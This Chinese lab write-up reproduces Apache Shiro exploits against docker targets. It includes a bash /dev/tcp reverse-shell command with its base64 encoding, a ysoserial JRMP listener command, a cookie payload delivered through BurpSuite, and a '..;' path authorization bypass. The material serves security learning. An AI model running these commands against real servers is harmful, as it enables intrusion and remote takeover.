Shiro反弹shell和权限绕过含工具包

★★免责声明★★
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

1、前言

反序列化漏洞原理和Shiro反序列化漏洞原理请参阅《反序列化漏洞(一)Shiro漏洞CVE-2016-4437复现》,【CVE-2019-12422】使用python脚本判断是否存在shiro漏洞,反弹shell漏洞利用,【CVE-2020-1957】Shiro权限绕过漏洞。

2、CVE-2019-12422

2.1、启动靶场环境
# 获取docker镜像
docker pull medicean/vulapps:s_shiro_1# 重启docker
systemctl restart docker# 启动docker镜像
docker run -d -p 8083:8080 medicean/vulapps:s_shiro_1# 查看靶场启动情况
docker-compose ps

在这里插入图片描述

2.2、访问靶场

访问:http://192.168.242.4:8083

在这里插入图片描述

2.3、判断漏洞是否存在

使用python脚本工具类shiropy,需要自己配置初始化,参考步骤:2.3.1、shiropy环境准备

2.3.1、shiropy环境准备

先把shiropy.zip解压,然后使用PyCharm编辑打开,操作路径:File->Open…,指定shiropy的目录然后点确定打开。

使用PyCharm编辑器设置解释器,操作路径:File->Settings…或使用快捷键Ctrl+Alt+S,弹出窗口,选择Project:shiropy->Python Interpreter,在右侧点Add Interpreter进行添加。

在这里插入图片描述

然后在外层再的点Apply按钮应用生效。

在这里插入图片描述

把项目需要的依赖lib导入进来,有两种方式:点编辑器上方的提示或使用命令进行install。

#批量安装依赖模块
pip install -r requirements.txt#将当前项目的所有依赖库导出为requirements.txt文件 ,所以在上面步骤添加解释器时不想用继承
pip freeze > requirements.txt

在这里插入图片描述

2.3.2、dnslog申请临时域名

在线网址:https://dnslog.org/,获取到子域名:f9afffca.dnslog.store

2.3.3、生成检测payload

使用shiro.py 脚本,生成检测payload,如果当前项目有存在文件:payload.cookie,手动删除一下。生成命令如下

# 双引号里面的域名是上一步骤获取的,自己再拼接上http://
python shiro.py "http://f9afffca.dnslog.store"

生成成功会在当前目录下多一个文件:payload.cookie。

2.3.4、BurpSuite拦截处理

先在浏览器用提供的测试号登录,登录时记得点Remember me复选框。

在这里插入图片描述

BurpSuite打开拦截,使用文本编辑器打开payload.cookie复制里面的内容,直接覆盖Cookie:后的内容,然后放包。

在这里插入图片描述

2.3.5、登录成功

界面显示登录成功

在这里插入图片描述

2.3.6、dns解析成功

刷新网站或点Get Results获取结果,发现有1条解析记录,表示存在漏洞。

在这里插入图片描述

2.4、漏洞利用(反弹 shell)
2.4.1、开启监听端口

在kali系统使用nc命令开启监听端口

# nc命令开启监听,kali系统ip: 192.168.242.4
nc -lvvp 10808# 监听成功,会有提示信息如下
listening on [any] 10808 ...
2.4.2、反弹shell命令
# 反弹shell指令-格式
/bin/bash -i >& /dev/tcp/反弹shell的IP/nc监听的端口 0>&1# 反弹shell指令-kali攻击机
/bin/bash -i >& /dev/tcp/192.168.242.4/10808 0>&1# 把以上payload进行base64编码,使用在线网址:https://base64.us/
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjQyLjQvMTA4MDggMD4mMQ==
2.4.3、开启JRMP

使用ysoserial-master-SNAPSHOT.jar开启JRMP监听

# 切换到目标目录
cd tools/shiro# 命令-格式
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 "bash -c {echo,base64反弹shell的payload}|{base64,-d}|{bash,-i}"# 目标执行的命令
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjQyLjQvMTA4MDggMD4mMQ==}|{base64,-d}|{bash,-i}"# 开启成功,会有提示信息如下
* Opening JRMP listener on 1099
2.4.4、构造payload

使用s.py构造payload,命令如下

# ip地址为kali系统也就是攻击机的ip,端口则为JRMP设置的端口值
python s.py 192.168.242.4:1099

运行成功会在下面生成一串内容,直接复制出来到登录时,使用BurpSuite拦截处理,步骤参考:第2.3.4、BurpSuite拦截处理。

在这里插入图片描述

2.4.5、BurpSuite拦截处理

因在第2.3步骤时有成功登录过,重新登录验证时先做下Log out登出操作,登录时记得点Remember me复选框。BurpSuite打开拦截,复制上步骤生成的内容,同样直接覆盖Cookie:后的内容,然后放包。

在这里插入图片描述

2.4.6、反弹shell成功

在JRMP监听窗口下有连接信息

在这里插入图片描述

在nc监听窗口,反弹shell成功

在这里插入图片描述

3、CVE-2020-1957

3.1、漏洞原理

Shiro权限绕过漏洞,在Apache Shiro 1.5.2以前的版本中,在使用Spring动态控制器时,攻击者通过构造路径包含..;这样的跳转,可以绕过Shiro中对目录的权限限制。

3.2、启动靶场环境
# 先切到对应目录
cd /home/kali/vulhub-master/shiro/CVE-2020-1957# 开启靶场
docker-compose up -d# 查看靶场启动情况
docker-compose ps
3.3、访问靶场

访问:http://192.168.242.4:8080

在这里插入图片描述

3.4、访问admin目录

回显302跳转,构造恶意请求 /xxx/..;/admin/

在这里插入图片描述

成功绕过。

4、资料获取

如果需要本文Shiro漏洞利用工具包,请关注公众号:大象只为你,后台回复:shiro漏洞。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/688365.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

如何使用Sora?Sora小白教程一文通

如果需要使用Sora或者GPT4,请参考文章:如何使用Sora?Sora小白教程一文通 什么是Sora Sora是OpenAI于2024年2月18日凌晨发布的新的文生视频大模型,名为 “ Sora ”。 从OpenAI在官网展示的Sora生成视频的效果来看,在生…

day34打卡

day34打卡 860. 柠檬水找零 解法,贪心:局部最优:遇到账单20,优先消耗美元10,完成本次找零 -》全局最优:完成全部账单的找零。 遇到5,直接收下遇到10,找一个5元遇到20,…

软件实例分享,台球厅收费系统电脑桌球店计时软件及灯控线路图教程

软件实例分享,台球厅收费系统电脑桌球店计时软件及灯控线路图教程 一、前言 以下软件程序教程以 佳易王桌球室计时计费软件V17.0为例说明 软件文件下载可以点击最下方官网卡片——软件下载——试用版软件下载 1、每个桌子对应的有 开台时间,所用的时…

python如何模拟登录Github

首先进入github登录页:https://github.com/login 输入账号密码,打开开发者工具,在Network页勾选上Preserve Log(显示持续日志),点击登录,查看Session请求,找到其请求的URL与Form Da…

【RL】Monte Carlo Learning(蒙特卡洛学习)

Lecture 5: Monte Carlo Learning The simplest MC-based RL algorithm: MC Basic 理解MC basic算法的关键是理解如何将policy iteration算法迁移到model-free的条件下。 Policy iteration算法在每次迭代过程中有两步: { Policy evaluation: v π k r π k γ…

java之VO,BO,PO,DO,DTO

概念 VO(View Object):视图对象,用于展示层,它的作用是把某个指定页面(或组件)的所有数据封装起来。DTO(Data Transfer Object):数据传输对象,这…

VMware虚拟机安装CentOS7

对于系统开发来说,开发者时常会需要涉及到不同的操作系统,比如Windows系统、Mac系统、Linux系统、Chrome OS系统、UNIX操作系统等。由于在同一台计算机上安装多个系统会占据我们大量的存储空间,所以虚拟机概念应运而生。本篇将介绍如何下载安…

趋高技术开发出超低价的视觉尺寸测量仪软件

2024年1月1日元旦节当日,深圳市趋高技术有限公司Fuxi实验室开发组成员成功开发出一款视觉尺寸测量仪软件。这款软件类比市场价格处于超低价。仅报三千二百元。有需要的码农或客户都可以了解一下,带回家。 趋高技术HITREND是深圳的一家高科技公司。 …

Navicat:在 Navicat 中创建外键约束

文章目录 1 表设计2 外键设置3 删除、更新操作设置4 保存 在 Navicat 中,可以在“表设计器”的“外键”选项卡上找到外键约束。 1 表设计 若要创建新的外键约束,请以“表设计器”打开子表(在本例中为 fwaq_flow_jcjd)&#xff0…

Linux系统的历史记录添加时间和IP信息

1 为什么要优化系统历史记录 对于linux系统,默认情况下,系统记录的历史命令比较简单。某些历史记录可能也无法正常保存,因此当服务器出现异常,希望通过历史命令来了解曾经做了哪些操作时,往往非常被动,下面…

[计算机网络]深度学习传输层TCP协议

💓 博客主页:从零开始的-CodeNinja之路 ⏩ 收录专栏:深度学习传输层TCP协议 🎉欢迎大家点赞👍评论📝收藏⭐文章 [计算机网络]深度学习传输层TCP协议 前提概括一: TCP协议段格式二:确认应答三:超时重传四:…

vivado RAM HDL Coding Techniques

Vivado synthesis可以解释各种RAM编码风格,并将它们映射到分布式RAM中或块RAM。此操作执行以下操作: •无需手动实例化RAM基元 •节省时间 •保持HDL源代码的可移植性和可扩展性从编码示例下载编码示例文件。 在分布式RAM和专用RAM之间的选择块存储器…

基于SSM的电影购票系统(有报告)。Javaee项目。ssm项目。

演示视频: 基于SSM的电影购票系统(有报告)。Javaee项目。ssm项目。 项目介绍: 采用M(model)V(view)C(controller)三层体系结构,通过Spring Spri…

十大经典排序算法之一--------------堆排序(java详解)

一.堆排序基本介绍: 堆排序是利用堆这种数据结构而设计的一种排序算法,堆排序是一种选择排序,它的最坏,最好,平均时间复杂度均为O(nlogn),它也是不稳定排序。堆是具有以下性质的完全二叉树:每个…

内存基础知识

内存作用:用来存放数据 int x10; xx1; 这会生成一个可执行文件(装入模块)然后存入内存地址中 绝对装入:-如果知道程序放到内存中哪个位置,编译程序将产生绝对地址的目标代码 可重定位装入&am…

idea 打不开项目 白屏

使用IDEA打开项目, 不知名原因崩溃了, 直接出现缩略图白屏。 解决过程: 尝试过重启IDEA,重启过电脑,重新引入相同项目(使用不同路径,存在缓存记录,依然打不开)&#xff…

数据结构——lesson3单链表介绍及实现

目录 1.什么是链表? 2.链表的分类 (1)无头单向非循环链表: (2)带头双向循环链表: 3.单链表的实现 (1)单链表的定义 (2)动态创建节点 &#…

删除链表的倒数第N个节点

删除链表的倒数第N个节点 给你一个链表,删除链表的倒数第 n 个结点,并且返回链表的头结点。 进阶:你能尝试使用一趟扫描实现吗? 示例 1: 输入:head [1,2,3,4,5], n 2 输出:[1,2,3,5] 示例…

蓝桥杯Java组备赛(二)

题目1 import java.util.Scanner;public class Main {public static void main(String[] args) {Scanner sc new Scanner(System.in);int n sc.nextInt();int max Integer.MIN_VALUE;int min Integer.MAX_VALUE;double sum 0;for(int i0;i<n;i) {int x sc.nextInt()…

文件上传漏洞--Upload-labs--Pass03--特殊后缀与::$DATA绕过

方法一&#xff1a;特殊后缀绕过&#xff1a; 一、什么是特殊后缀绕过 源代码中的黑名单禁止一系列后缀名 之外的后缀&#xff0c;称之为‘特殊后缀名’&#xff0c;利用其来绕过黑名单&#xff0c;达到上传含有恶意代码的文件的目的。 二、代码审计 接下来对代码逐条拆解进行…